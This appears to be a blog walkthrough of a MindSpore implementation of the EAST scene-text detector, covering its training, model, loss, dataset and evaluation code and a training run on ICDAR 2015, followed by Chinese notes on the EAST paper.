    load_param_into_net(network, parm_dict)  # copy them into the network
    args.logger.info('finish load pretrained_backbone')  # record it in the log

network = EastWithLossCell(network)  # combine the EAST model with its loss function
if args.resume_east:  # if args.resume_east is not None, resume a previously saved EAST model
    param_dict = load_checkpoint(args.resume_east)
    load_param_into_net(network, param_dict)
    args.logger.info('finish get resume east')

args.logger.info('finish get network')

# Load the dataset: create_east_dataset() takes the image folder, the ground-truth folder,
# the batch size, the device count, and the rank, and returns the dataset plus its size.
ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
                                    device_num=args.group_size, rank=args.rank, is_training=True)
args.logger.info('Finish loading dataset')

# Steps per epoch = dataset size / batch size / device count
args.steps_per_epoch = int(
    data_size /
    args.per_batch_size /
    args.group_size)

if not args.ckpt_interval:
    # If args.ckpt_interval is unset, checkpoint once per epoch
    args.ckpt_interval = args.steps_per_epoch

Setting up the optimizer

# get learning rate
lr = get_lr(args)  # the learning rate for the current epoch
opt = Adam(  # the Adam optimizer over the trainable parameter groups of the EAST network
    params=get_param_groups(network),
    learning_rate=Tensor(
        lr,
        ms.float32))
loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True)  # fixed loss-scale manager
model = Model(network, optimizer=opt, loss_scale_manager=loss_scale)  # wrap the network, optimizer, and loss scaling into a trainable Model

Training

Start training:

network.set_train()  # put the network in training mode
# Save the network model and parameters for subsequent fine-tuning.
# Checkpoint config: how many steps between checkpoints and how many to keep.
config_ck = CheckpointConfig(
    save_checkpoint_steps=100,
    keep_checkpoint_max=1)
# Where the model parameters are saved
save_ckpt_path = os.path.join(
    args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
# A ModelCheckpoint callback that saves the parameters: prefix is the filename
# prefix, directory the save path, config the checkpoint configuration above.
ckpoint_cb = ModelCheckpoint(
    prefix="checkpoint_east",
    directory=save_ckpt_path,
    config=config_ck)
callback = [
    TimeMonitor(data_size=data_size),
    LossMonitor(),
    ckpoint_cb
]
# model.train() runs the training: total epoch count, the dataset, and the callbacks.
# dataset_sink_mode=True enables dataset sinking for better throughput.
model.train(
    args.max_epoch,
    ds,
    callbacks=callback,
    dataset_sink_mode=True)
args.logger.info('==========end training===============')

src/util.py

Defines some utility classes and functions (which I can't fully follow, orz):

• class AverageMeter: tracks the running average and current value of each metric during training
• default_wd_filter(): a default weight-decay filter that excludes parameters that should not be decayed, such as biases and the weights and biases of batch-norm layers
• get_param_groups(): takes a network model network and splits its trainable parameters into a weight-decayed group and an undecayed group, returning a list of parameter groups, each holding the keys params and weight_decay
• class ShapeRecord: a class that records image sizes

src/east.py

class EAST

Defines the EAST network class EAST:

class EAST(nn.Cell):
    def __init__(self):
        super(EAST, self).__init__()
        # Feature-extraction module; returns 5 feature maps for the later stages
        self.extractor = VGG16FeatureExtraction()
        # Feature-merging module; concatenates the 5 feature maps into a richer representation
        self.merge = Merge()
        # Output module; convolves the merged features into the text score map and the geometry map geo
        self.output = Output()

    def construct(self, x_1):
        # Run the input x_1 through self.extractor() to get 5 feature maps
        f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
        # Merge them with self.merge()
        x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
        # Feed the merged map into self.output() to get the score and geometry predictions
        score, geo = self.output(x_1)

        return score, geo

(figure: the EAST architecture diagram again)

The code corresponds to the three parts of the paper:

• Feature extractor stem (PVANet) - class VGG16FeatureExtraction
  • extracts image features, returning 5 feature maps for the later stages
• Feature-merging branch - class Merge
  • concatenates the 5 feature maps, forming a richer combined representation for the later stages
• Output layer - class Output
  • convolves the merged feature map into the text-region score map score and the geometry map geo

class VGG16FeatureExtraction

Essentially defines a pile of convolution kernels and applies them as in the paper, returning 5 feature maps; note the feature-map numbering appears to be reversed relative to the paper.

class VGG16FeatureExtraction(nn.Cell):
    """VGG16FeatureExtraction for deeptext"""

    def __init__(self):
        super(VGG16FeatureExtraction, self).__init__()
        self.relu = nn.ReLU()
        self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
        self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

        self.conv1_1 = _conv(
            in_channels=3,
            out_channels=64,
            kernel_size=3,
            padding=1)

        ……

        self.conv5_3 = _conv(
            in_channels=512,
            out_channels=512,
            kernel_size=3,
            padding=1)
        self.cast = P.Cast()

    def construct(self, out):
        """ Construction of VGG """
        f_0 = out
        out = self.cast(out, mstype.float32)
        out = self.conv1_1(out)
        out = self.relu(out)
        out = self.conv1_2(out)
        out = self.relu(out)
        out = self.max_pool(out)

        ……

        out = self.max_pool(out)
        f_4 = out
        out = self.conv5_1(out)
        out = self.relu(out)
        out = self.conv5_2(out)
        out = self.relu(out)
        out = self.conv5_3(out)
        out = self.relu(out)
        out = self.max_pool(out)
        f_5 = out

        return f_0, f_2, f_3, f_4, f_5

    class Merge

    P是 MindSpore 中的一个模块,代表了运算符(operators)。我们可以通过import mindspore.ops as P来引入这个模块,从而使用其中定义的各种运算符函数,例如上述代码中使用的Concat()ResizeBilinear()函数。

    也是定义一堆函数:

    • ResizeBilinear():是 MindSpore 中的一个图像处理函数,在图像上进行双线性插值,将输入图像缩放到指定大小。由于该模型中需要特征融合操作,因此使用该函数将不同尺度的特征图调整到相同尺寸,便于进行特征拼接。
    • concat():特征图拼接
    • nn.BatchNorm2d(128):是 MindSpore 中的一个二维批归一化函数,用于对网络模型中的卷积层或全连接层的输出进行归一化处理,以便更好地协调不同神经元之间的协同工作。
    • relu():激活函数
    class Merge(nn.Cell):
    def __init__(self):
    super(Merge, self).__init__()

    self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
    self.bn1 = nn.BatchNorm2d(128)
    self.relu1 = nn.ReLU()
    self.conv2 = nn.Conv2d(
    128,
    128,
    3,
    padding=1,
    pad_mode='pad',
    has_bias=True)
    self.bn2 = nn.BatchNorm2d(128)
    self.relu2 = nn.ReLU()

    ……

    def construct(self, x, f1, f2, f3, f4):
    img_hight = P.Shape()(x)[2]
    img_width = P.Shape()(x)[3]

    out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
    out = self.concat((out, f3))
    out = self.relu1(self.bn1(self.conv1(out)))
    out = self.relu2(self.bn2(self.conv2(out)))

    out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
    out = self.concat((out, f2))
    out = self.relu3(self.bn3(self.conv3(out)))
    out = self.relu4(self.bn4(self.conv4(out)))

    out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
    out = self.concat((out, f1))
    out = self.relu5(self.bn5(self.conv5(out)))
    out = self.relu6(self.bn6(self.conv6(out)))

    out = self.relu7(self.bn7(self.conv7(out)))
    return out

class Output

class Output(nn.Cell):
    def __init__(self, scope=512):
        super(Output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1)
        self.sigmoid1 = nn.Sigmoid()
        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = scope
        self.concat = P.Concat(axis=1)
        self.PI = 3.1415926535898

    def construct(self, x):
        score = self.sigmoid1(self.conv1(x))  # text-region score
        loc = self.sigmoid2(self.conv2(x)) * self.scope  # location: the 4 AABB distances
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI  # rotation angle
        geo = self.concat((loc, angle))  # box information: location plus angle
        return score, geo  # return the score map and the concatenated geometry

class EastLossBlock

When computing the loss, this module first computes the classification loss: the predicted text-region scores are compared against the ground-truth scores via a Dice coefficient.

Next, the predicted and ground-truth geometry maps are split apart, and the location loss is computed from the intersection-over-union (IoU) and the angle error; their weighted sum is the overall location loss. The angle error uses a cosine term.

When computing the location loss, samples that are not real text regions must be excluded: the location values, classification labels, and predictions at non-text pixels are masked out so they do not pollute the loss.

Finally, the classification and location losses are summed with weights and returned as the total loss.

class EastLossBlock(nn.Cell):
    def __init__(self):
        super(EastLossBlock, self).__init__()
        self.split = P.Split(1, 5)
        self.min = MyMin()
        self.log = P.Log()
        self.cos = P.Cos()
        self.mean = P.ReduceMean(keep_dims=False)
        self.sum = P.ReduceSum()
        self.eps = 1e-5
        self.dice = DiceCoefficient()

    def construct(
            self,
            y_true_cls,
            y_pred_cls,
            y_true_geo,
            y_pred_geo,
            training_mask):
        ans = self.sum(y_true_cls)
        # Compare predicted and ground-truth text scores via the Dice coefficient
        classification_loss = self.dice(
            y_true_cls, y_pred_cls * (1 - training_mask))

        # n * 5 * h * w
        # Split predicted and ground-truth geometry into the 4 distances and the angle
        d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
        d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
        area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
        area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
        w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
        h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

        area_intersect = w_union * h_union
        area_union = area_gt + area_pred - area_intersect
        # Location loss from the IoU and the angle error
        iou_loss_map = -self.log((area_intersect + 1.0) /
                                 (area_union + 1.0))  # iou_loss_map
        angle_loss_map = 1 - self.cos(theta_pred - theta_gt)  # angle_loss_map

        # The angle error is the cosine term; both losses are averaged over text pixels
        angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
        iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
        geo_loss = 10 * angle_loss + iou_loss

        return geo_loss + classification_loss

class EastWithLossCell

class EastWithLossCell(nn.Cell):
    def __init__(self, network):
        super(EastWithLossCell, self).__init__()
        # The EAST model, used as the network module of the graph
        self.east_network = network
        # An EastLossBlock instance, used as the loss module of the graph
        self.loss = EastLossBlock()

    def construct(self, img, true_cls, true_geo, training_mask):
        """
        img: input image
        true_cls: classification labels
        true_geo: geometry labels
        training_mask: mask that filters out non-text regions
        """
        # Forward pass through the network
        score, geometry = self.east_network(img)
        # Feed the predicted score and geometry into the loss module and return the loss
        loss = self.loss(
            true_cls,
            score,
            true_geo,
            geometry,
            training_mask)
        return loss

src/dataset.py

create_east_dataset()

def create_east_dataset(
        img_root,
        txt_root,
        batch_size,
        device_num,
        rank,
        is_training=True):
    # Instantiate ICDAREASTDataset with the image and ground-truth paths; it reads and parses both
    east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
    # A distributed sampler that partitions and dispatches the data across devices
    distributed_sampler = DistributedSampler(
        len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

    trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25),  # randomly jitter saturation, contrast, and brightness
                  CV.Rescale(1 / 255.0, 0),                   # rescale pixel values
                  CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),  # normalize the image
                  CV.HWC2CHW()]  # convert the layout from HWC (height x width x channels) to CHW
    if is_training:  # training mode
        dataset_column_names = [
            "image",          # the image
            "score_map",      # classification score map
            "geo_map",        # geometry map
            "training_mask"]  # training mask
        # Build the dataset with MindSpore's GeneratorDataset
        ds = de.GeneratorDataset(
            east_data,
            column_names=dataset_column_names,
            num_parallel_workers=32,  # parallel workers for loading and augmentation
            # The sampler picks the samples from the dataset;
            # here it is the distributed_sampler built above
            sampler=distributed_sampler)
        # map() runs the transform list over the image column for augmentation
        ds = ds.map(
            operations=trans_list,
            input_columns=["image"],
            num_parallel_workers=8,
            python_multiprocessing=True)
        # batch() groups the samples into batches of batch_size
        ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

    return ds, len(east_data)

class ICDAREASTDataset

class ICDAREASTDataset:
    def __init__(self, img_path, gt_path, scale=0.25, length=512):
        super(ICDAREASTDataset, self).__init__()
        self.img_files = [os.path.join(
            img_path,
            img_file) for img_file in sorted(os.listdir(img_path))]
        self.gt_files = [
            os.path.join(
                gt_path,
                gt_file) for gt_file in sorted(
                os.listdir(gt_path))]
        self.scale = scale    # scaling factor
        self.length = length  # side length of the cropped image

    def __getitem__(self, index):
        with open(self.gt_files[index], 'r') as f:
            lines = f.readlines()
        vertices, labels = extract_vertices(lines)  # extract the text-region vertices and labels from the annotation

        img = Image.open(self.img_files[index])  # read the image
        img, vertices = adjust_height(img, vertices)  # adjust the height
        img, vertices = rotate_img(img, vertices)  # randomly rotate the image
        img, vertices = crop_img(img, vertices, labels, self.length)  # crop the image to the target size
        score_map, geo_map, ignored_map = get_score_geo(
            img, vertices, labels, self.scale, self.length)  # score map, geometry map, and ignored map
        score_map = score_map.transpose(2, 0, 1)
        ignored_map = ignored_map.transpose(2, 0, 1)
        geo_map = geo_map.transpose(2, 0, 1)
        if np.sum(score_map) < 1:
            score_map[0, 0, 0] = 1
        return img, score_map, geo_map, ignored_map

    def __len__(self):
        return len(self.img_files)

extract_vertices()

def extract_vertices(lines):
    '''extract vertices info from txt lines
    Input:
        lines   : list of strings; each string describes one text region, including its vertex coordinates and label
    Output:
        vertices: vertices of text regions <numpy.ndarray, (n,8)>
        labels  : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
    '''
    labels = []    # the final labels
    vertices = []  # the vertex info
    for line in lines:
        # Strip the trailing newline and the leading BOM (Byte Order Mark),
        # then split the line on commas; the first eight fields are the integer coordinates
        vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
        label = 0 if '###' in line else 1
        labels.append(label)
    # Return the vertices and labels as numpy arrays
    return np.array(vertices), np.array(labels)
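An ICDAR-2015 ground-truth line has the form x1,y1,...,x4,y4,transcription, with ### marking illegible regions. A quick check of extract_vertices, assuming the function above is in scope (the sample lines are made up):

lines = ["377,117,463,117,465,130,378,130,Genaxis Theatre\n",
         "493,115,519,115,519,131,493,131,###\n"]
vertices, labels = extract_vertices(lines)
print(vertices.shape)  # (2, 8)
print(labels)          # [1 0]: '###' marks an ignored region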

adjust_height()

def adjust_height(img, vertices, ratio=0.2):
    '''adjust height of image to aug data
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        ratio       : height changes in [0.8, 1.2]
    Output:
        img         : adjusted PIL Image
        new_vertices: adjusted vertices
    '''
    ratio_h = 1 + ratio * (np.random.rand() * 2 - 1)  # randomly perturb the image height
    old_h = img.height
    # Compute the new height new_h from the scaling factor ratio_h: multiply the original
    # height old_h and round to the nearest integer (np.around() is NumPy's rounding
    # function; its default precision is 0).
    new_h = int(np.around(old_h * ratio_h))
    img = img.resize((img.width, new_h), Image.BILINEAR)

    new_vertices = vertices.copy()
    if vertices.size > 0:
        new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
    # Return the resized image and the updated vertex coordinates
    return img, new_vertices

rotate_img()

def rotate_img(img, vertices, angle_range=10):
    '''rotate image [-10, 10] degree to aug data
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        angle_range : rotate range
    Output:
        img         : rotated PIL Image
        new_vertices: rotated vertices
    '''
    # The rotation center
    center_x = (img.width - 1) / 2
    center_y = (img.height - 1) / 2
    angle = angle_range * (np.random.rand() * 2 - 1)
    # BILINEAR interpolation gives a smoother rotated image
    img = img.rotate(angle, Image.BILINEAR)
    # new_vertices, an all-zero array of shape vertices.shape, holds the rotated coordinates
    new_vertices = np.zeros(vertices.shape)
    for i, vertice in enumerate(vertices):
        # For each text region, rotate_vertices() computes the rotated coordinates
        new_vertices[i, :] = rotate_vertices(
            vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
    return img, new_vertices

crop_img()

def crop_img(img, vertices, labels, length):
    '''crop img patches to obtain batch and augment
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        labels      : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
        length      : length of cropped image region
    Output:
        region      : cropped image region
        new_vertices: new vertices in cropped region
    '''
    # The original height h and width w
    h, w = img.height, img.width
    # Confirm the shortest side of the image >= length: if the shorter side is
    # below the crop length, resize the image with PIL's resize()
    if h >= w and w < length:
        img = img.resize((length, int(h * length / w)), Image.BILINEAR)
    elif h < w and h < length:
        img = img.resize((int(w * length / h), length), Image.BILINEAR)
    ratio_w = img.width / w
    ratio_h = img.height / h
    assert (ratio_w >= 1 and ratio_h >= 1)

    # Scale the vertices by the same ratios as the image
    new_vertices = np.zeros(vertices.shape)
    if vertices.size > 0:
        new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
        new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

    # Find a random crop position and check that the crop does not cut through
    # a text region, to avoid occluding or truncating text
    remain_h = img.height - length
    remain_w = img.width - length
    flag = True
    cnt = 0
    while flag and cnt < 1000:
        # If the random crop intersects a text region, keep sampling new positions,
        # up to at most 1000 attempts
        cnt += 1
        start_w = int(np.random.rand() * remain_w)
        start_h = int(np.random.rand() * remain_h)
        flag = is_cross_text([start_w, start_h], length,
                             new_vertices[labels == 1, :])
    box = (start_w, start_h, start_w + length, start_h + length)
    # Crop the region out of the image with PIL's crop() and return it
    region = img.crop(box)
    if new_vertices.size == 0:
        # No text regions: return the cropped region and the empty vertex array
        return region, new_vertices
    # Re-express the vertices relative to the crop's top-left corner (start_w, start_h)
    new_vertices[:, [0, 2, 4, 6]] -= start_w
    new_vertices[:, [1, 3, 5, 7]] -= start_h
    return region, new_vertices

eval.py

First, argparse sets up a handful of parameters:

| name | type | default | help |
| --- | --- | --- | --- |
| --device_target | str | 'Ascend' | device where the code will be implemented. (Default: Ascend) |
| --device_num | int | 5 | device count; with only 1 device, 5 fails but 0 works |
| --test_img_path | str | './data/icdar2015/Test/images/' | test-set path |
| --checkpoint_path | str | | model path |

context.set_context(
    mode=context.GRAPH_MODE,           # graph mode
    device_target=args.device_target,  # device type
    save_graphs=False,                 # whether to save the computation graph
    device_id=args.device_num)         # device id

main

Set up the model, the dataset, and the save path, then run:

if __name__ == '__main__':
    model_name = args.checkpoint_path
    test_img_path = args.test_img_path
    submit_path = './submit'
    eval_model(model_name, test_img_path, submit_path)

eval_model()

def eval_model(name, img_path, submit, save_flag=True):
    '''
    name: path of the model checkpoint
    img_path: folder containing the test images
    submit: folder where the results are written
    save_flag: whether to keep the intermediate results
    '''
    # If the output directory exists, delete it and its children, then recreate it
    if os.path.exists(submit):
        shutil.rmtree(submit)
    os.mkdir(submit)
    # Build the EAST model
    network = EAST()
    # Load the pretrained weights
    param_dict = load_checkpoint(name)
    load_param_into_net(network, param_dict)
    # Put the model in training mode (as the original repo does)
    network.set_train(True)

    start_time = time.time()
    # detect_dataset() runs detection over the test images and writes the results into submit
    detect_dataset(network, img_path, submit)
    os.chdir(submit)
    res = subprocess.getoutput('zip -q submit.zip *.txt')
    res = subprocess.getoutput('mv submit.zip ../')
    os.chdir('../')
    # Run the evaluation script ./evaluate/script.py to compute the metrics; the output lands in res
    res = subprocess.getoutput(
        'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
    print(res)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time() - start_time))

    if not save_flag:
        # If save_flag is False, delete the output directory and its children (smells like legacy code)
        shutil.rmtree(submit)

detect.py

detect_dataset()

def detect_dataset(model, test_img_path, submit_path):
    """
    detection on whole dataset, save .txt results in submit_path
    Input:
        model        : detection model instance
        test_img_path: folder containing the test images
        submit_path  : folder where the results for evaluation are written
    """
    # Read all test images and sort them by file name
    img_files = os.listdir(test_img_path)
    img_files = sorted([os.path.join(test_img_path, img_file)
                        for img_file in img_files])

    for i, img_file in enumerate(img_files):
        # For each image, detect() returns the box coordinates
        print('evaluating {} image'.format(i), end='\r')  # progress log
        boxes = detect(Image.open(img_file), model)
        seq = []
        if boxes is not None:
            # If the detection is non-empty, serialize the box coordinates
            # into comma-separated strings and collect them in seq
            seq.extend([','.join([str(int(b))
                                  for b in box[:-1]]) + '\n' for box in boxes])
        # Save seq as a .txt named after the image, under submit_path
        with open(os.path.join(submit_path, 'res_' +
                               os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
            f.writelines(seq)

detect()

def detect(img, model):
    """detect text regions of img using model
    Input:
        img   : PIL Image
        model : detection model
    Output:
        detected polys
    """
    # Resize the input image, keeping the scaling ratios ratio_h and ratio_w
    img, ratio_h, ratio_w = resize_img(img)
    # Run the model over the resized image to get the score map and the geometry map geo
    score, geo = model(load_pil(img))
    # Drop the batch dimension (4-D to 3-D) with MindSpore's Squeeze() operator
    score = P.Squeeze(0)(score)
    geo = P.Squeeze(0)(geo)
    # Recover the box coordinates from the score and geometry maps via get_boxes()
    boxes = get_boxes(score.asnumpy(), geo.asnumpy())
    # Map the detected boxes back onto the original image using ratio_h and ratio_w, via adjust_ratio()
    return adjust_ratio(boxes, ratio_w, ratio_h)

get_boxes()

def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
    """get boxes from feature map
    Input:
        score       : score map from model <numpy.ndarray, (1,row,col)>
        geo         : geo map from model <numpy.ndarray, (5,row,col)>
        score_thresh: threshold to segment score map
        nms_thresh  : threshold in nms
    Output:
        boxes       : final polys <numpy.ndarray, (n,9)>
    """
    # Drop the leading dimension of score, making it a 2-D array
    score = score[0, :, :]
    # Find the points above score_thresh and record them as (r, c) pairs in an n x 2 matrix
    xy_text = np.argwhere(score > score_thresh)  # n x 2, format is [r, c]
    if xy_text.size == 0:
        return None

    # Sort xy_text by row so earlier points take priority, then swap the columns
    # into (x, y) order (the column index is x, the row index is y)
    xy_text = xy_text[np.argsort(xy_text[:, 0])]
    valid_pos = xy_text[:, ::-1].copy()  # n x 2, [x, y]
    # Gather the geometry values at the valid positions into a 5 x n matrix
    valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]]  # 5 x n
    # restore_polys() turns valid_pos and valid_geo back into polygon coordinates, with their indices
    polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
    if polys_restored.size == 0:
        return None

    # Pack the polygons into an (n, 9) array: the first 8 columns are the corner
    # coordinates, the 9th the confidence (the value in the score map)
    boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
    boxes[:, :8] = polys_restored
    boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
    # Run locality-aware non-maximum suppression (NMS) to obtain the final boxes
    boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
    return boxes

adjust_ratio()

Using the earlier scaling ratios ratio_h and ratio_w, map the detected boxes back onto the original image:

def adjust_ratio(boxes, ratio_w, ratio_h):
    """refine boxes
    Input:
        boxes  : detected polys <numpy.ndarray, (n,9)>
        ratio_w: ratio of width
        ratio_h: ratio of height
    Output:
        refined boxes
    """
    if boxes is None or boxes.size == 0:
        return None
    boxes[:, [0, 2, 4, 6]] /= ratio_w
    boxes[:, [1, 3, 5, 7]] /= ratio_h
    return np.around(boxes)

Run!

1. Switch to a MindSpore 2.0 image; an image with a MindSpore that is too old will die...

(figure: selecting the MindSpore 2.0 image)

2. EAST for Ascend - Gitee.com: pull the repository, preferably into the work/ folder so the data survives server restarts. Training also needs:

   • Dataset: ICDAR 2015: Focused Scene Text, with 1000 training images and 500 test images

   • "The pretrained_path should be a checkpoint of vgg16 trained on Imagenet2012." A VGG16 model pretrained on ImageNet2012; no download link is given, so it took me forever to find, hmph

     • On the MindSpore site, under Resources - Hub, search for vgg16, find the download page, and fetch vgg16_ascend_v190_imagenet2012_official_cv_top1acc73.49_top5acc91.56.ckpt

(figure: the vgg16 checkpoint on MindSpore Hub)

3. Adjust the repository's parser arguments, the dataset location, and the pretrained-model location so the paths line up.

In this project, the file organization is recommended as below:

.
└─data
  └─icdar2015
    ├─Training        # Training set
    │ ├─image         # Images in training set
    │ └─groundTruth   # GT in training set
    └─Test            # Test set
      ├─image         # Images in test set
      └─groundTruth   # GT in test set

(figure: the file layout)

4. Environment setup, one-stop! The things in requirements.txt are genuinely hard to install; doing it by hand works better...

source activate base  # the first login needs activate base
python -c "import mindspore;mindspore.run_check()" # check the mindspore version
conda create -n east --clone base # clone the base environment
conda activate east # activate the east environment
pip install numpy
pip install opencv-python
pip install shapely
pip install pillow
pip install lanms-neo
pip install --upgrade setuptools # upgrade setuptools
pip install Polygon3 # hard to install; may need the setuptools upgrade first
pip install onnxruntime

Once the environment is ready, save the server image, so the next restart keeps everything installed:

(figure: saving the server image)

5. cd into the repository and run train.py:

cd /home/ma-user/work/east/
python3 train.py

(figure: the hyperparameters being printed)

After the hyperparameters are printed, training starts; just keep waiting.

(figure: training in progress)

6. Training ran from 14:27 to 18:41 and brewed one shiny elixir: checkpoint_east-600_125.ckpt

(figure: the trained checkpoint)

7. Set the arguments of eval.py:

   • --device_num: the number of Ascend devices; I rented only 1, so set it to 0
   • --test_img_path: the test-set path; evaluate reads its images from here
   • --checkpoint_path: the model path, pointing at the freshly brewed checkpoint: outputs/2023-05-15_time_14_27_25/ckpt_0/checkpoint_east-600_125.ckpt

(figure: the eval.py arguments)

8. "The evaluation scripts are from ICDAR Offline evaluation and have been modified to run successfully with Python 3.7.1."

   Download script_test_ch4_t1_e1-1577983151.zip from that link and put it in evaluate/:

(figure: the evaluation script in place)

9. Run eval.py:

python3 eval.py

The results appear in submit\; compared against the ground truth, it does recognize a few things.

(figure: detection results vs ground truth)

The returned numbers are quite a bit worse than advertised, sob...

Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
    ]]>
    + 资源

    正文

​ 我们这个模型使用单个神经网络,直接预测完整图像中任意方向、四边形形状的单词或文本行,消除了不必要的中间步骤(如候选聚合和单词划分)。我们的模型在 ICDAR 2015、COCO-Text 和 MSRA-TD500 上都非常好使!


    ​ 文本检测作为后续过程的先决条件,核心是设计特征来区分文本和背景。

​ 提出了一个快速准确的场景文本检测流水线,使用一个**全卷积神经网络(FCN)**模型,产生单词或文本行级别的预测,排除了冗余和缓慢的中间步骤。生成的文本预测可以是旋转的矩形或四边形,再送入**非极大值抑制(Non-Maximum Suppression,NMS)**以产生最终结果。


    EAST, since it is an Efficient and Accuracy Scene Text detection pipeline.

    png

    • Feature extractor
stem,特征提取主干(PVANet)

• 主干可以是在 ImageNet 数据集上预先训练的卷积网络,具有交错的卷积和池化层。从主干提取四个级别的特征图,表示为 $f_i$,其大小分别为输入图像的 $\frac{1}{32},\frac{1}{16},\frac{1}{8}$ 和 $\frac{1}{4}$。
    • Feature-merging
      branch,特征合并分支

      • 逐渐将它们合并(concat):

$g_i=\begin{cases}\mathrm{unpool}(h_i) & \mathrm{if}\ i\le 3\\ \mathrm{conv}_{3\times3}(h_i) & \mathrm{if}\ i=4\end{cases}$

$h_i=\begin{cases}f_i & \mathrm{if}\ i=1\\ \mathrm{conv}_{3\times3}(\mathrm{conv}_{1\times1}([g_{i-1};f_i])) & \mathrm{otherwise}\end{cases}$

        • $g_i$ 是合并基数

        • $h_i$ 是合并后的特征图

        • 运算符 $[·;·]$ 表示沿通道轴的串联

      • 在每个合并阶段,来自最后一个阶段的特征图首先被馈送到 unpool 层以使其大小加倍,然后与当前特征图连接。

      • $\mathrm{conv}_{1×1}$ 减少了通道数量并减少了计算

      • $\mathrm{conv}_{3\times3}$ 融合了信息,最终产生了这个合并阶段的输出

      • 在最后一个合并阶段之后,$\mathrm{conv}_{3\times3}$ 层生成合并分支的最终特征图,并将其提供给输出层。

    • Output layer,输出层

      • 对文本区域的两种几何形状进行实验:

        • 旋转框(RBOX)
• 4 个通道的轴对齐边界框(AABB)$\mathbf R$(每个像素到文本框四条边的距离)
          • 1 个通道旋转角度 $\theta$
        • 四边形(QUAD)
• 使用 8 个数字来表示从四边形的四个角顶点 $\{p_i\mid i\in\{1,2,3,4\}\}$ 到像素位置的坐标偏移,由于每个偏移包含两个数字 $(\Delta x_i,\Delta y_i)$,几何输出共 8 个通道。
    • 为每种几何形状设计了不同的损失函数:

      • $L=L_s+\lambda_gL_g$

• $L_s$ 表示分数图的损失,$L_{s}=\mathrm{balanced\text{-}xent}(\hat{\mathbf{Y}},\mathbf{Y}^*)=-\beta\mathbf{Y}^*\log\hat{\mathbf{Y}}-(1-\beta)(1-\mathbf{Y}^*)\log(1-\hat{\mathbf{Y}})$

          • $\hat{\mathbf{Y}}=F_s$ 是分数图的预测
• $\mathbf Y^*$ 是 ground truth
• $\beta$ 是正样本和负样本之间的平衡因子,$\beta=1-\frac{\sum_{y^*\in\mathbf Y^*}y^*}{|\mathbf Y^*|}$
• $L_g$ 表示几何图形的损失;若直接用 $L_1$ 或 $L_2$ 距离回归,会使损失偏向更大、更长的文本区域,所以按几何形状设计了尺度不变的损失。

• 在 RBOX 回归中:$L_g=L_{AABB}+\lambda_\theta L_{\theta}$,$\lambda_\theta$ 取 10

• AABB 部分采用 IoU 损失:$L_{AABB}=-\log\mathrm{IoU}(\hat{\mathbf{R}},\mathbf R^*)=-\log\frac{|\hat{\mathbf{R}}\cap \mathbf R^*|}{|\hat{\mathbf{R}}\cup \mathbf R^*|}$

• 旋转角度损失:$L_\theta(\hat\theta,\theta^*)=1-\cos(\hat\theta-\theta^*)$

          • 在 QUAD 回归中采用尺度归一化平滑 $L_1$ 损失:$L_g=L_{QUAD}(\hat{\mathbf{Q}},\mathbf Q^*)$

        • $\lambda_g$ 表示两个损失之间的重要性,设为 1。

    • 包含几个 $\mathrm{conv}_{1×1}$ 操作,将 32 个通道的特征图投影到 1 个通道的分数图 $F_s$ 和一个多通道的几何图 $F_g$ 中。几何输出可以是 RBOX 或 QUAD 中的一个

